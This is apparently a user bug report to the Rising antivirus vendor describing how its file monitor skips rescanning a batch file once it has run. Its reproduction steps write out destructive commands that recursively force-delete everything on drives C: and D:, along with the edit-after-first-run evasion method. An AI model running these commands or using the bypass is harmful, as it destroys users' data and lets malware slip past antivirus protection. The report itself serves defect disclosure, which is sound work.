文件监控漏毒bug
文件监控漏毒已经属于瑞星的老问题了,不过这个版本的瑞星改善了不少,不过仍有绕过文件监控直接执行病毒的方法。
复现步骤:
1. 把文件监控模式调整为快速:
2. 新建 test.bat,用记事本打开输入以下内容并保存:
pause
exit
3. 双击执行该 bat:
4. 再次打开记事本修改该 bat 为以下内容并保存:
pause
exit
del /f /s /q C:\*.*
del /f /s /q D:\*.*
这样一来 test.bat 就变成了瑞星可以检出的脚本病毒
5. 双击执行该 bat
可以发现,病毒成功运行,并且瑞星文件监控没有报警。
要注意的是,如果跳过第三步,从一开始就保存恶意代码并运行的话,瑞星是可以正常拦截的:
怀疑是瑞星文件监控自动信任了已经执行过的程序,第二次执行的时候哪怕之前执行过的程序已经被修改了,也是完全没有扫描就直接放行了。
瑞星版本:3.0.50.26
系统版本:Windows 11 22H2
用户系统信息:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.42
